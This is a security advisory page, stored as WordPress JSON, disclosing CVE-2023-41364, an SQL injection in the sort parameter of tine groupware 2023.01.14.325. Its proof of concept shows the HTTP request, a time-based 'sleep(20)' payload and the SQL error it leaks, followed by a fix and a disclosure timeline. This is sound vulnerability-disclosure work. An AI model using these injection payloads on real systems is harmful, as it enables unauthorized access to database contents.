{"id":20803,"date":"2023-08-29T09:03:59","date_gmt":"2023-08-29T07:03:59","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=20803"},"modified":"2023-12-20T11:10:01","modified_gmt":"2023-12-20T10:10:01","slug":"usd-2023-0002","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2023-0002\/","title":{"rendered":"usd-2023-0002"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.23.1\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2023-0002 | tine20 2023.01.14.325 - SQL Injection<\/h1>\n<h1><\/h1>\n<p><strong>Advisory ID<\/strong>: usd-2023-0002<br \/>\n<strong>Product<\/strong>: tine groupware<br \/>\n<strong>Affected Version<\/strong>: 2023.01.14.325<br \/>\n<strong>Vulnerability Type<\/strong>: CWE 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')<br \/>\n<strong>Security Risk<\/strong>: Critical<br \/>\n<strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.tine-groupware.de\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.tine-groupware.de\/<\/a><br \/>\n<strong>Vendor Status<\/strong>: Fixed<br \/>\n<strong>CVE number<\/strong>: CVE-2023-41364<br \/>\n<strong>CVE Link<\/strong>: <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-41364\" target=\"_blank\" rel=\"noopener\">https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-41364<\/a><br \/>\n<strong>Last Update<\/strong>: 2023-08-28<\/p>\n<h3><\/h3>\n<h3>Description<\/h3>\n<p>Tine Groupware is an open source software that provides a suite of collaborative tools and applications for communication and project management within a business or organization.<br \/>\nIt offers features such as email, calendars, task management, contact management, and document management, allowing users to coordinate and share information across teams and departments.<\/p>\n<p>During our research on open open source software, we discovered, that the <strong>sort<\/strong> parameter of the <strong>\/index.php<\/strong> endpoint is vulnerable to SQL-Injection.<\/p>\n<h3>Proof of Concept<\/h3>\n<p>The request below was used to search contacts in the addressbook.<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/index.php?transactionid=ae67275bb875279ab755f7e8932334f1f67fbb4c<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">localhost:4000<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">376<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">TINE20SESSID=isgch37p9s2ql7rl902b9cjabk; usercredentialcache=eyJpZCI6ImNmZWE3Y2Y4OGE5MjcyM2M5N2JkMWNkOTRmYmRjNzA1ZGY5NzJiODEiLCJrZXkiOiI0MGU1MWE5NTE1ZDIwMWExOTE0MmYxNmMifQ%3D%3D<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">close\n[...]\n<\/span>\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"jsonrpc\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"2.0\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"method\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"Addressbook.searchContacts\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"params\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"filter\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:[{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"condition\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"OR\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"filters\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:[{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"condition\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"AND\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"filters\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:[],<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"ext-comp-1229\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"label\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"Contacts\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}],<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"FilterPanel\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">},{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"field\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"query\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"operator\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"contains\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"value\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"kc\" style=\"background: #263238;color: #89ddff\">null<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"quickFilter\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}],<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"paging\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"sort\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"n_fileas'\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"dir\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"ASC\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"start\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"limit\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">50<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}},<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"id\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">33<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<\/span><\/pre>\n<\/div>\n<p>The response contains the SQL query if injecting more SQLi payloads:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nv\" style=\"background: #263238;color: #89ddff\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"mf\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"mi\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"nv\" style=\"background: #263238;color: #89ddff\">OK<\/span>\n<span class=\"nv\" style=\"background: #263238;color: #89ddff\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"s s-Atom\" style=\"background: #263238;color: #c3e88d\">nginx<\/span>\n<span class=\"nv\" style=\"background: #263238;color: #89ddff\">Content<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">-<\/span><span class=\"nv\" style=\"background: #263238;color: #89ddff\">Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"s s-Atom\" style=\"background: #263238;color: #c3e88d\">application<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"s s-Atom\" style=\"background: #263238;color: #c3e88d\">json<\/span>\n<span class=\"nv\" style=\"background: #263238;color: #89ddff\">Content<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">-<\/span><span class=\"nv\" style=\"background: #263238;color: #89ddff\">Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"mi\" style=\"background: #263238;color: #f78c6c\">3853\n[...]\n<\/span>\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"error\"<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"code\"<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:-<\/span><span class=\"mi\" style=\"background: #263238;color: #f78c6c\">32000<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"message\"<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"SQLSTATE[42S22]: Column not found: 1054 Unknown column 'n_fileas, sleep(20)' in 'order clause', query was: SELECT **addressbook**.*, (CASE WHEN **addressbook_image**.**contact_id** IS NULL THEN 0 ELSE 1 END) AS **jpegphoto**, **accounts**.**id** AS **account_id** FROM **tine_addressbook** AS **addressbook**\\n LEFT JOIN **tine_addressbook_image** AS **addressbook_image** ON **addressbook**.**id** = **addressbook_image**.**contact_id**\\n LEFT JOIN **tine_accounts** AS **accounts** ON **addressbook**.**id** = **accounts**.**contact_id** WHERE (**addressbook**.**is_deleted** = 0) AND (**addressbook**.**id** in ('8862248fdce32e46c05a84b12c9e74407f44a23b', 'b70f5321b4339a037e5427ec2504dafa84006d15')) GROUP BY **addressbook**.**id** ORDER BY **n_fileas, sleep(20)** ASC, **account_id** ASC\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">,<\/span><\/pre>\n<\/div>\n<p>Injecting a <strong>sleep(20)<\/strong> into the parameter delays the response.<\/p>\n<p>A successful exploitation of this vulnerability allows an unauthorized person to gain access to sensitive data in the database.<\/p>\n<h3>Fix<\/h3>\n<p>It is recommended to use prepared statements.<\/p>\n<h3>References<\/h3>\n<ul>\n<li><a href=\"https:\/\/owasp.org\/www-community\/attacks\/SQL_Injection\" target=\"_blank\" rel=\"noopener\">https:\/\/owasp.org\/www-community\/attacks\/SQL_Injection<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2023-01-24<\/strong>: First contact request via mail<\/li>\n<li><strong>2023-04-21<\/strong>: Ask vendor for status update<\/li>\n<li><strong>2023-05-04<\/strong>: Vendor does not see an exploitable vulnerability<\/li>\n<li><strong>2023-05-15<\/strong>: Share more payloads and proofs to the vendor<\/li>\n<li><strong>2023-05-17<\/strong>: Vendor denies exploitable vulnerability<\/li>\n<li><strong>2023-05-23<\/strong>: Vulnerability is fixed, according to the vendor<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Christian P\u00f6schl of usd AG.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2023-0002 | tine20 2023.01.14.325 - SQL Injection Advisory ID: usd-2023-0002 Product: tine groupware Affected Version: 2023.01.14.325 Vulnerability Type: CWE 89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Security Risk: Critical Vendor URL: https:\/\/www.tine-groupware.de\/ Vendor Status: Fixed CVE number: CVE-2023-41364 CVE Link: https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2023-41364 Last Update: 2023-08-28 Description Tine Groupware is [&hellip;]<\/p>\n","protected":false},"author":115,"featured_media":17032,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-20803","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/115"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=20803"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20803\/revisions"}],"predecessor-version":[{"id":21666,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/20803\/revisions\/21666"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media\/17032"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=20803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}